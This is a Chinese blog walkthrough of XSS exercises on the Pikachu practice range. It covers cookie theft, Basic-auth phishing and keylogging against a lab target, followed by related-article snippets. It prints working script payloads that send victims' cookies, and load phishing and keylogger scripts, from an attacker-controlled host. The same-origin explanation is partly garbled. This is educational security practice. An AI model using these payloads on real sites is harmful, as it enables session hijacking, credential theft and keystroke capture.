Pikachu-XSS漏洞之cookie值获取、钓鱼结果和键盘记录实战记录

已于 2024-08-17 23:32:28 修改
阅读量755 收藏 11
点赞数 17
文章标签: xss
于 2024-08-17 17:45:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74608722/article/details/139675119
版权

目录

Pikachu-XSS漏洞之cookie值获取、钓鱼结果和键盘记录实战记录

一、XSS(get型)之cookie值获取:

二、xss(post型)之cookie值获取

三、Xss之钓鱼攻击

四、XSS获取键盘记

Pikachu-XSS漏洞之cookie值获取、钓鱼结果和键盘记录实战记录

一、XSS(get型)之cookie值获取:
入侵主机ip:192.168.24.220   靶机ip:192.168.24.140**
​
**好了,所有的Pikachu模块我们都已经练习完了,但是还遗留下一些实战训练,我们今天就来一口气完成!
在开始做题之前我们先来一些准备工作:**注意:最好设置两台主机,Pikachu环境中的pkxss是可以随意移动的独立的XSS攻击文件,我们需将pkxss文件移到入侵者的主机,搭建一个XSS后台,其也就是入侵者获取cookie值得工具。**

img编辑

我们还要把靶机界面源码的字符长度限制修改一下啊:

img编辑

我们先进入Xss后台查看一下,一条cookie值得获取记录都没有:

img编辑

在输入框中输入下面语句,输入完后会重定向到Pikachu的首页:我们提前设计好的。

<script>document.location = 'http://192.168.24.220/Pikachu-master/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

看,界面跳转了,我们看看cookie值去!

补充个知识点

img编辑

cookie值:

img编辑

二、xss(post型)之cookie值获取

  • 首先我们登录进去,我们发现界面和get型的是完全一样的,我们随便输入点东西:发现并没有在url里面显示,那怎么回事那,其实这个就是post型的,请求是通过post的方式发送的。

img编辑

img编辑

我们抓包来看一下:

img编辑

果然是,那么怎么办呐,有得法子,我们可以设置一个表单,当用户点击了我们的表单连接,就可以让用户替我们发送一个提交请求,这样后面的就又和上面的get型一样了!

  • 但是之前我们要去修改几个参数:

img编辑

  • @1、处的就是我们诱导用户提交的post请求

    • @2、处的还是进入我们的平台,获取cookie值。

      • 我们修改完表单后,发送至另外一台主机,ip:192.168.24.130 发送到根目录下。

不多说,基本一样!

三、Xss之钓鱼攻击

  • 具体流程:我们可以向用户发送一个链接请求,用户点击后会给我们提前搭建好的后台发出一个请求,后台收到请求后会返回一个身份信息验证的Basic头部,如果用户安全意识不够,输入了敏感信息:用户名和密码,然后这些就会被发送到pkxss后台。

    • 实验:我们用到的是xss存储型模块。

      • 首先进入是一个留言板:

img

我们只需要在这个留言板处嵌入一个能够访问我们后台后并且能返回Basic认证的标签就行,

这里可以用a标签、img、<script>

<script src="http://192.168.24.220/Pikachu-master/pkxss/xfish/fish.php"></script>

但是在这之前,我们还需要来做一些准备工作:

img编辑

和我们之前获取cookie一样,钓鱼的后台也有个接口(xfish.php)获取远程的数据,通过get方式去获取账号密码存到库里面。没有结果会返回三个heard头部

img编辑

<script src="http://192.168.24.220/Pikachu-master/pkxss/xfish/fish.php"></script>

img编辑

看,成功了!

img编辑

四、XSS获取键盘记

  • 跨域概念

    http://(协议) www.(子域名)xyz.com(主域名):8080(端口)/ script/text.js(资源地址)
 当协议、主机(主域名、子域名)、端口中的任意一个不相同时,称为不同域。不同域之间请求数据的操作,称为跨域操作。

  • 跨域-同源策略**

    <script src="...">`//加载图片到本地执行

     为了安全考虑,所有浏览器都约定了”同源策略“,同源策略规定,两个不同域名之间不能使用JS进行相互操作。比如:x.com域名下的JavaScript并不能操作y.com域名下的对象。
 如果想要跨域操作,则需要管理员进行特殊的配置。
 比如通过:header(”Acess-Control-Allow-Origin:x.cm“)指定。
 tips:以下标签跨域加载资源(资源类型是有限制的)是不受同源策略限制的。
​
 <script src="...">`//加载图片到本地执行

    <script src="...">`//加载图片到本地执行

    //图片

    <link href="...">//css

    file:///C:/Users/96082/AppData/Roaming/Typora/draftsRecover/...

我们来进行实验:(xss存储模块)

首先还是准备工作,修改ip:

img编辑

img编辑

输入:

<script src= "http://192.168.24.220/Pikachu-master/pkxss/rkeypress/rk.js"></script>

img编辑

如果不是按照上图修改,就会违反同源策略:

img编辑

不变的梦
关注
  • 17
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
简单的利用XSS获取用户cookie
shy的博客
10-25 4312
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
XSS获取COOKIE
04-20
XSS获取COOKIE
网络安全渗透测试零基础入门必知必会】之XSS攻击获取用户cookie和用户密码(实战演示)零基础入门到精通收藏这一篇就够了
最新发布
HUANGXIN9898的博客
07-10 1262
渗透测试-地基篇:该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
使用XSS漏洞获取cookies
Decaede的博客
01-26 1174
使用XSS漏洞获取cookies
利用XSS漏洞cookie
qq_68163788的博客
01-15 1809
XSS漏洞是一种跨站脚本攻击,攻击者可以在受害者的浏览器中注入恶意脚本,从而获取用户的敏感信息,如cookie。 当受害者访问包含恶意脚本的页面时,恶意脚本会获取受害者的cookie信息,并将其发送到攻击者的服务器。攻击者可以利用这些cookie信息来冒充受害者进行各种操作,比如登录受害者的账户。为了防止XSS漏洞,网站开发者应该对用户输入进行严格的过滤和验证,避免将未经验证的用户输入直接输出到页面上。另外,网站可以使用XSS防护工具或者采用安全的编程实践来防止XSS漏洞的发生。
渗透测试-跨站脚本攻击xss获取cookie
lza20001103的博客
04-24 4883
渗透测试-跨站脚本攻击xss获取cookie
XSS漏洞利用之cookie获取
国内一线红队,擅长攻防渗透,APT
08-01 1万+
目录 环境搭建 盗取cookie 关于documen.cookie获取不到cookie httponly 刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞,也知道xss是可以盗取cookie的,但是至于怎么盗取cookie其实很多同学可能还不是很清楚,也可能并没有实质性的去探讨过这个问题。 环境搭建 思路:攻击者本地搭建的一个网站存在xss漏洞,并且在与网站同一个ip的服务器中使用浏览器进行了登录,此时访问了一个恶意链接,这个恶意链接,直接将cookie获取并发送到hacker服务
pikachu-xss.txt
06-10
pikachu-xss
pikachu-master.zip
06-25
Pikachu靶场,正如其名,以其全面的漏洞练习和丰富的实践环节,成为提升网络安全技能的理想平台。 靶场的核心在于模拟实际漏洞,帮助我们理解和应对各种网络威胁。在这个靶场中,你可以接触到如SQL注入、XSS跨站...
pikachu-master
05-04
Pikachu是一款开源的Web安全漏洞扫描器,主要针对Web应用进行安全检测,涵盖了SQL注入、XSS跨站脚本、文件包含、命令执行等多种常见漏洞类型。它的设计目标是简化安全测试过程,帮助用户快速发现潜在的安全问题,...
pikachu-interpreter:神秘的编程语言“皮卡丘”的解释器
05-09
$ python -m pikachu {PikachuFileName} 您还可以指定要预加载到主堆栈上的n个整数(名为pi pikachu )。 使用以下语法,其中[args]表示以空格分隔的整数列表。 $ python -m pikachu {PikachuFileName} [args]
利用XSS获取cookie
热门推荐
littlecjx
11-04 2万+
如果web应用在用户输入的地方没有过滤特殊字符,比如<, >, ', ", <script>, javascript 等字符,而且在变量输出的地方没有使用安全的编码函数,比如PHP的htmlentities()和htmlspecialchars()函数,JavaScript中的escapeJavascript函数,这样的web应用极易出现XSS漏洞XSS攻击的危害主要有盗取用户cookie、跳转到
XSS获取cookie
qq_40273198的博客
11-21 4596
   DVWA XSS获取cookie 反射型 一、LOW 1.被害者已经登录http://127.0.0.1/DVWA/vulnerabilities/xss_r/ 网站,该网站存在xss漏洞。 网站源代码如下:未进行任何过滤 &lt;?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key...
xss获取cookie
kiihuang的博客
03-31 880
主要是借助存储型xss漏洞,来进行攻击的,获取每个访问人的cookie
XSS平台获取cookie
qq_41048303的博客
02-19 3610
XSS平台获取cookie 1.环境介绍 靶场:pikachu XSS平台:BLUE-LOTUS 浏览器:火狐浏览器 2.流程介绍 登录XSS平台,创建获取cookie的脚本 var website = "http://网站地址"; (function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return d
xss -- cookie获取
qq726232111的博客
09-11 675
0x0 cookie 简介 储存在用户本地终端上的数据,服务端可通过session会话获取cookie信息,cookie可用于身份验证,临时存储信息(商城网站的购物车)等 0x1 实验流程 用户点击构造链接 --> 发送cookie到指定服务器 --> 接收cookie保存到文件 0x2 实验环境 实验环境 window+phpstudy+dvwa dvwa中提供...
XSS平台与cookie获取
永远是少年
11-21 1170
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS平台与cookie获取。 一、XSS攻击目的 二、XSS平台 三、XSS攻击获取cookie简介
利用 XSS 获取 Cookie 利用DOM XSS
weixin_71416901的博客
06-21 1049
XSS
xss获取cookie的方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-27 1837
xss获取cookie简单步骤如下: 1、在存在漏洞的论坛中发日志。 2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了。 3、这是没有账户前的登陆界面。 4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据,xss获取cookie 5、替换cookie后不用输用户名密码
pikachu靶场xss钓鱼攻击
09-29
pikachu靶场中的XSS钓鱼攻击是通过构造钓鱼页面来实现的。攻击者将发送Basic认证的认证框修改为指向自己的服务器地址,并在钓鱼页面中插入恶意的代码。当用户访问被篡改的页面时,恶意代码将被执行,从而导致攻击成功。 具体步骤如下: 1. 攻击者需要构造一个钓鱼页面,将发送Basic认证的认证框修改为指向自己的服务器地址。 2. 钓鱼页面中插入恶意代码,以便在用户访问该页面时进行攻击。 3. 当用户访问被篡改的页面时,恶意代码将被执行,从而实现XSS钓鱼攻击。 请注意,XSS钓鱼攻击是一种常见的网络攻击方式,攻击者利用网页中存在的安全漏洞,通过注入恶意代码,从而获取用户的敏感信息或进行其他恶意行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值